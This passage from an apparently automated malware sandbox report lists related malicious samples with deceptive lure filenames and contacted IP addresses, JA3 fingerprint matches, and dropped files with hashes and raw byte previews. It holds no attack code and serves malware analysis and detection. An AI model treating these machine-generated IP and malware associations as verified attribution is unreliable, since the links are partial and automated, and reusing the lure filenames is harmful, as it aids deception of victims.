                                                                                                                                                                                    • 172.67.160.46
                                                                                                                                                                                    rpWXlHY6Yu.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    PZRXT66bXP.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 172.67.160.46
                                                                                                                                                                                    Ov7BGYlLKa.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 162.159.134.233
                                                                                                                                                                                    68IcLCtkQh.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 104.21.9.146
                                                                                                                                                                                    OVHFRcleaner.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.38.9.216
                                                                                                                                                                                    GhostHack.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.38.9.216
                                                                                                                                                                                    A3aCLmM4IV.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 94.23.247.226
                                                                                                                                                                                    KATnano.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 51.178.104.138
                                                                                                                                                                                    eoLFeDmXeFGet hashmaliciousBrowse
                                                                                                                                                                                    • 213.32.101.152
                                                                                                                                                                                    ngIRoAe7bcGet hashmaliciousBrowse
                                                                                                                                                                                    • 213.32.101.152
                                                                                                                                                                                    DdYPGYn755Get hashmaliciousBrowse
                                                                                                                                                                                    • 213.32.101.152
                                                                                                                                                                                    Knw7ywLKF0Get hashmaliciousBrowse
                                                                                                                                                                                    • 213.32.101.152
                                                                                                                                                                                    R2tO4hqVRRGet hashmaliciousBrowse
                                                                                                                                                                                    • 213.32.101.152
                                                                                                                                                                                    T2812A.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 213.186.33.5
                                                                                                                                                                                    3jVSL3JwMT.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 51.210.64.36
                                                                                                                                                                                    kn2MdWxD2A.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 146.59.209.152
                                                                                                                                                                                    shipping docs 07853 draft CI+PL_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 198.50.252.64
                                                                                                                                                                                    LjLRG55.HtMLGet hashmaliciousBrowse
                                                                                                                                                                                    • 145.239.131.51
                                                                                                                                                                                    chcfl#U007eremit-1106 xls.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 145.239.131.55
                                                                                                                                                                                    CUENTA.MOVISTAR.SELPODQMCASSXUHGYKSHBCZSTZQERL#U00c9.msiGet hashmaliciousBrowse
                                                                                                                                                                                    • 54.39.73.214
                                                                                                                                                                                    protocol.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 192.99.46.215
                                                                                                                                                                                    protocol.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    • 192.99.46.215
                                                                                                                                                                                    dot#U007eremit-2458 xls.HtmLGet hashmaliciousBrowse
                                                                                                                                                                                    • 145.239.131.55
                                                                                                                                                                                    SecuriteInfo.com.Drixed-FJXAE4472036314.31475.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 149.202.179.100
                                                                                                                                                                                    FASTLYUShwid.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    Invoice Overdue_C0809-H03.xls.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                                    RdCWJ3MAGz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.111.133
                                                                                                                                                                                    oldmystat3.dllGet hashmaliciousBrowse
                                                                                                                                                                                    • 151.101.1.108
                                                                                                                                                                                    INVOICE.jarGet hashmaliciousBrowse
                                                                                                                                                                                    • 199.232.192.209
                                                                                                                                                                                    Laposte Facture.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 151.101.112.193
                                                                                                                                                                                    New Fax Message from 120283803.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.153
                                                                                                                                                                                    Md0q201V1D.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.109.133
                                                                                                                                                                                    Incoming_Wire_payment_returned120 ___vaw.jarGet hashmaliciousBrowse
                                                                                                                                                                                    • 199.232.192.209
                                                                                                                                                                                    fm3FU6sW77.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    AY5uCs0HrY.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                    Hgny9xwmj6.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                    Pv9fSenm0V.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    t63ouMqJ8f.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                    pq9FtcL817.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.110.133
                                                                                                                                                                                    gnykCySWj5.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    YRbcV0B6TZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    KpDtm40Lne.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    6oi3E5jdTR.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    Software patch by Silensix.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0ehwid.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    XyG3cm8ODX.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    gYqJR2QY0c.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    a6e69af95b2cfafbdc192c5c34d065b8e51925534824b.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    YSRWM1JB1M.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    pAjlqBTFRL.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    ke8B44hYm7.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    YBgpKQdR09.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    6PBKRPVQHk.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    5HDXE0jkfQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    PAYMENT-SWIFTCOPY.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    r7oFL1z7IE.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    F7E3DjYJpC.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    25Kf6vSBoq.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    cnv622JnZv.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    OxoMaKoP4r.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    y8WngeDn4q.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    SYzU0M7gx6.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    Order 7637 Vessel.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233
                                                                                                                                                                                    21sSRmeUyz.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 185.199.108.133
                                                                                                                                                                                    • 162.159.133.233

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\0e1a63fc-9228-4b4f-96fc-fee060f96e92\GunaDotNetRT64.dllFIa4FloXT2.exeGet hashmaliciousBrowse

                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_turbosquad_suppo_d08111be3443c4681ae8224f88caea542e8c43c2_20e07757_0f3400b7\Report.wer
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                      Entropy (8bit):0.8228210065632738
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:KgFOh0b4URvQ6we5Q6aeDFfYpXIQcQgc6pkcE8cw36Gm+HbHg/8BRTf3Oy1KazWa:/AQbnAH+VkGPjuq/u7sJS274ItGu
                                                                                                                                                                                      MD5:F86D33C4F30CA34888F6290B4F69275E
                                                                                                                                                                                      SHA1:60146C34ED527880C95C70FF990968C664AFCA2D
                                                                                                                                                                                      SHA-256:0A2EFEFF67181943DEF266A0959E0EB93B01CC4CEDD3639911F81E79FB765322
                                                                                                                                                                                      SHA-512:359D560FB019F3AEB193658A3C6F881D6107F05830DEFE2B03331B219B3D225389B5F8302F0E1411A6C92333356EADBF093303DB7788C9440658607F65D958FD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.0.1.0.0.7.0.2.8.0.3.2.3.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.0.1.0.0.7.0.9.8.5.0.1.0.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.b.8.b.5.d.a.-.8.d.4.4.-.4.0.b.e.-.8.c.6.a.-.5.2.b.b.3.c.b.b.a.e.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.9.6.c.5.1.c.-.8.8.e.0.-.4.9.2.c.-.b.5.5.5.-.f.e.c.9.2.6.7.8.7.a.8.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.u.r.b.o.s.q.u.a.d._.s.u.p.p.o.r.t.4.1.7.9.8.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.7.0.-.0.0.0.1.-.0.0.1.c.-.6.5.4.2.-.7.d.e.8.c.f.c.d.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.f.9.2.e.f.9.8.a.d.2.6.3.6.a.6.f.e.3.2.6.9.4.c.e.9.8.8.8.f.7.0.0.0.0.0.9.0.4.!.0.0.0.0.8.4.f.3.7.c.1.1.0.1.b.c.4.c.3.f.4.f.c.7.8.3.7.8.e.c.9.d.b.1.b.c.c.1.1.2.7.4.7.7.!.t.u.r.b.o.s.q.u.a.d._.
                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER692A.tmp.dmp
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sat Oct 30 20:51:44 2021, 0x1205a4 type
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):954842
                                                                                                                                                                                      Entropy (8bit):0.9942582337224434
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:3xUQyezIKwDHTE8KscEkGdnUuU7M0TZOAuZolD2fHD0jNKFasR+GL7eiEYi:36ectAXsPdnUuU7MBAuZBjENKFBlLXi
                                                                                                                                                                                      MD5:6EC0BF40A6C5234BDC11D1270D068FA5
                                                                                                                                                                                      SHA1:56CBD020825788099606853C46B23A1D4D9271DC
                                                                                                                                                                                      SHA-256:72327A4E91152E224D94CFD135224180379D7EFB008C926EB3291726F4FD3FF3
                                                                                                                                                                                      SHA-512:7669751939D333524D8D92675112E4C65BDA89D1BC19F2F03F7678473FD43FCF9899A988BEBA4454FC109A08FCB34E26F5455F740D5585BC60487EFA3796F436
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: MDMP....... .......`.}a........................@...........$....(..........T.......8...........T................}...........................................................................................U...........B..............GenuineIntelW...........T.......p...O.}a.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER767A.tmp.WERInternalMetadata.xml
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8374
                                                                                                                                                                                      Entropy (8bit):3.6987384878242824
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Rrl7r3GLNidg6cA6YAb6kt3gmfiLLLiS5WGnCpDl89blzsfBAXm:RrlsNia6cA6Y06k3gmfivOShllYfr
                                                                                                                                                                                      MD5:8E20B9BB31F0C06FDE55DD429CE344DA
                                                                                                                                                                                      SHA1:270C97AEF7321638714C078460A9A87BE48D251F
                                                                                                                                                                                      SHA-256:5A555CFD1D4BA0632C4312C4B43C16859FE7F22294F3A06B999EDA0F7905112C
                                                                                                                                                                                      SHA-512:D02E8EF1C1BC6B92A4DBA9A881E8E3BFC4D61A6AC13BB62C88830FF092D2433EBA994B36BC8310EBCAC6FB68A7DF052C4653CD326BF0630B97725229881B6009
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.4.4.<./.P.i.d.>.......
                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B1E.tmp.xml
                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4694
                                                                                                                                                                                      Entropy (8bit):4.515527678748664
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:cvIwSD8zsJtJgtWI9aMWSC8BK8fm8M4JZNG7eBFx+q8QtiitwQOh5G9jd:uITfJH9lSNpJZuihckOh5G9jd
                                                                                                                                                                                      MD5:153A4F0E7BBFFD95D20059FE5D9907AD
                                                                                                                                                                                      SHA1:076A98F47D4E0D013DC723A314FF2E9DA1A293C0
                                                                                                                                                                                      SHA-256:2CC8361653C307B8A1A725A7D679BC8606802F92386A26A7A4AA3C3C6F9DB790
                                                                                                                                                                                      SHA-512:27819672FF77611C246DE1ACC6A765D16519F888127986954438E556E2A59137E426CB6070131E01FC2403827C2B47FA92CC3684F1D426F969951F82A608F38E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1233002" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.16.210\Atani Classic\launcherAssets\ataniclassic.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):45109
                                                                                                                                                                                      Entropy (8bit):7.8570817230445105
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:n3Ar0boY+jOTkEeHHjtPQF5kDN44/RN6VoMxvjymbZpIoTwbTPqnVlNwTh0TSM2T:401+jIpKHdQex/HAoMx2OIMwvqnDGh08
                                                                                                                                                                                      MD5:E5EF6BDF0C495893AF82822F51711550
                                                                                                                                                                                      SHA1:B09AD5ECAAED6AF91DD24E031AAF8BCEAE1AE055
                                                                                                                                                                                      SHA-256:5A47FA7B19198BCAD18091AE138A411B44FAA2DDC2D9891650061CBDB63094DA
                                                                                                                                                                                      SHA-512:3408CE2F0727E223F939B4D34FD9035083EDDD7A0A8ACE2A038D98D201DBEB1C48D1DA0B5335D21DCDD8DDC726B5F117611247CFDACC9CD046D2C9DCDE0CD492
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^...mY..nT,gE.)..@D..E.Lf.W.....i.$...!Yj..&..9$9d.Y..\.Y.....(.$.2.....6.>...y.G....s...~....o.w.x....[7n...Bz...v...F.y....G..u....F.+y.:.......Gu.O.r.(..........|`TS.p.Z.z.?].H.fy..9?..T.Q.......~.....;....g........jv......{v..d_.......ZC.|..'y.B:v...nL.....5.^..$Z.....E.at.+..M.?..f...g....V..J....%.z.zq.....?........9.X.j..}.]L....7....o...u..:}..l......n.z....Q.....bbT#V...iC.K.KT.....Y.1H_U..Bt...b..x..Q.....+9be..^..(...&.|.{.......|.......}..._6...>.....F.K....Q...:........D.B.<p....9.Y.o..o..{.|^..y...Ou...].%...L.FIw.>..G./.-f>..^~.]...+...v.*....w..Ox.....n./..+_..0....c.uA.wc.Np[z.f.G.k...b.....*....._.....D7...]....Z...sF5.Z.X./..(...tu.?.......k..q..Z[.kdW..X....@{...t..FD.}.9.8".*.....8./.*.<..."m.....%..._%.N..{.t.|..v4J...U...G.:..~.xW3.O.Z....|b.kt..7...n.........n......Q~.....M?.y....W..Gq$V..].9.99.J..r....v.
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.16.220\Atani Classic\launcherAssets\ataniclassic.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):45109
                                                                                                                                                                                      Entropy (8bit):7.8570817230445105
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:n3Ar0boY+jOTkEeHHjtPQF5kDN44/RN6VoMxvjymbZpIoTwbTPqnVlNwTh0TSM2T:401+jIpKHdQex/HAoMx2OIMwvqnDGh08
                                                                                                                                                                                      MD5:E5EF6BDF0C495893AF82822F51711550
                                                                                                                                                                                      SHA1:B09AD5ECAAED6AF91DD24E031AAF8BCEAE1AE055
                                                                                                                                                                                      SHA-256:5A47FA7B19198BCAD18091AE138A411B44FAA2DDC2D9891650061CBDB63094DA
                                                                                                                                                                                      SHA-512:3408CE2F0727E223F939B4D34FD9035083EDDD7A0A8ACE2A038D98D201DBEB1C48D1DA0B5335D21DCDD8DDC726B5F117611247CFDACC9CD046D2C9DCDE0CD492
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^...mY..nT,gE.)..@D..E.Lf.W.....i.$...!Yj..&..9$9d.Y..\.Y.....(.$.2.....6.>...y.G....s...~....o.w.x....[7n...Bz...v...F.y....G..u....F.+y.:.......Gu.O.r.(..........|`TS.p.Z.z.?].H.fy..9?..T.Q.......~.....;....g........jv......{v..d_.......ZC.|..'y.B:v...nL.....5.^..$Z.....E.at.+..M.?..f...g....V..J....%.z.zq.....?........9.X.j..}.]L....7....o...u..:}..l......n.z....Q.....bbT#V...iC.K.KT.....Y.1H_U..Bt...b..x..Q.....+9be..^..(...&.|.{.......|.......}..._6...>.....F.K....Q...:........D.B.<p....9.Y.o..o..{.|^..y...Ou...].%...L.FIw.>..G./.-f>..^~.]...+...v.*....w..Ox.....n./..+_..0....c.uA.wc.Np[z.f.G.k...b.....*....._.....D7...]....Z...sF5.Z.X./..(...tu.?.......k..q..Z[.kdW..X....@{...t..FD.}.9.8".*.....8./.*.<..."m.....%..._%.N..{.t.|..v4J...U...G.:..~.xW3.O.Z....|b.kt..7...n.........n......Q~.....M?.y....W..Gq$V..].9.99.J..r....v.
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.16.221\Atani\launcherAssets\atani2.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):86444
                                                                                                                                                                                      Entropy (8bit):7.97474810962429
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:iDM9Tl/fu0Psc+a3bdDq9wlccIxibLaK7ueBBoXFXySC/GSs2qpVj13X:iDuZ/f7E5+lfIxive+oViSDS14VjNX
                                                                                                                                                                                      MD5:5FBEDC12274BEF9A8145419C71C4BD26
                                                                                                                                                                                      SHA1:EA8F653B2FFD1268CED1543BC444A1B0AB0EECDB
                                                                                                                                                                                      SHA-256:0D74CE3916F157F40481F22B37834022C54FA2F47E18EE7E4E715EC8E5619B01
                                                                                                                                                                                      SHA-512:C198603E5BDB72B431E382D848070A5C78242A3925807DBC3F0A5B4DBBEDFC3262A88FB0BCD0945C5EE39C8FA6D8D8F920E4179923E33FA57A4770CF2452BCA1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....n]........8.#E..ccc..`0.Ecz((...(Loz02Ar...Q2.(R..E.E.D.$Q.L2I&...D.2K.d......r_.......\...}......<.....}?..........O.b.....t[..B.(...i.l%.G...d.B..s....o..5...4.S..R..H.._z.~:...5.=s...4$X'.....gU....N.59. ..}r...XQ..}.;...u.NB...........H..:..V..L...O+.}M..J.C...3.v..Z..3.....b9N..~..}Y.H.Q..q...|c.... .&.8....Z..g.vd$...~.=a.qP...B.~...M.....1.3.I:y......E...>...5.]...[.g.\...:..N..).D..%W..z1.U|..|(....w..u...us?1ro.G.'..io.T..`.->..s.-.X-X.4."..{Q.u.z)d,..SW....#..........Fc.\.)..CH.=..*....0'.~#{...x..PW..0..u.?.3{.Z....7..........o...........e0o.....2..d<k2.b.N...g.#....e....Cv.MKZ...rv.......n.....'#...5....}../.1..>9..^...iT[..aV.........YC..^..n.....iF..KM9...cz......H..YL3.r.q. n*...?.@{.)..GT.......5]k.........Kq.3..!.ekL......yE...[.BP..*MS.r..$....4....O.z...q...|0..4..x..;zkiX<.M..oe...X.n..(.^>P..nZ]........V}.....s..
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.16.221\Ataraxia\launcherAssets\ataraxiaback.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):40189
                                                                                                                                                                                      Entropy (8bit):7.970407783115247
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:QMPKqRByLk2eEOhHCv9afsLw3pClGPaRovWPXSVqpGNVcRoQAS8NdkX:RPNHU2E4f/p/PhW2qIUTLD
                                                                                                                                                                                      MD5:DAA4E4C20057E3E41838BAEC248E875E
                                                                                                                                                                                      SHA1:9D40A3299C6A565682015DF6638D7A384042EB26
                                                                                                                                                                                      SHA-256:BC458DCEBC79B9D21AEEE59B2FE24CCDAC8E702169173CF0DD536D7F47AC13B3
                                                                                                                                                                                      SHA-512:FDEC06A1465A50062E997D892171A4E5BA2274F55BDF84A0E63F2ED36D85A288F67D9EC510C0E57BF9F9E763B5DAEDC312D20EC5730078AA0F533202F4ED077A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^...}......BEd.?..?.g..2T4j.,M.4+.T.T..y..*.....d.....E.B...k..:k......{.{>..^...>......w.[...#n>F.|..>......H..:..|...s. ...K.C..#.....K..K.#~..=...1\.-.V.....#..N..k1N..0(...<B...9.........2.r,.(>$...e30{I.X.$[..g.U....dJ$.#h3.?/.C..c.@.4UBt.....b.Q".....>,@.|...H.I..b..Cv..6zW..kc3..:.-..y,k..&+IS..?.Y....n`....g.R..V..g..~..<p...I|HN'.......z......5.1.r..SR'......./.^....6...c...k.....xi{}.......v.K.o,".......bv. /....."l.c}..eH.:.j.....p..+V ..F...F.,.s)......R..V.....1.....]..'3...y~..HElj..N.n.l[.Mq...'AI.>g._..IS....zX.m@../.o...7npJH.c.].......u..xP./..#hk...@)cx.F.)c..y^.W&R.V.x1....5...K#.l*6......q,.\.].n...G.o``*.^~..$..X4.z3..E..'w..4...6./n.r%...eMg...7..!$)a.....1f-.B...P\..CJ}u......hx.`...8....!..=.1..q..\[m}t..u.......3..<...l.n.....K..l.},.j+.a...F.....5$. ..v.!U...k..n...\C.X.|.a.k`n...f...i.Z(.*9s..-.c.k.&0..&.~.M.zRk...\..8F
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.16.221\Aurora\launcherAssets\auroraback.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
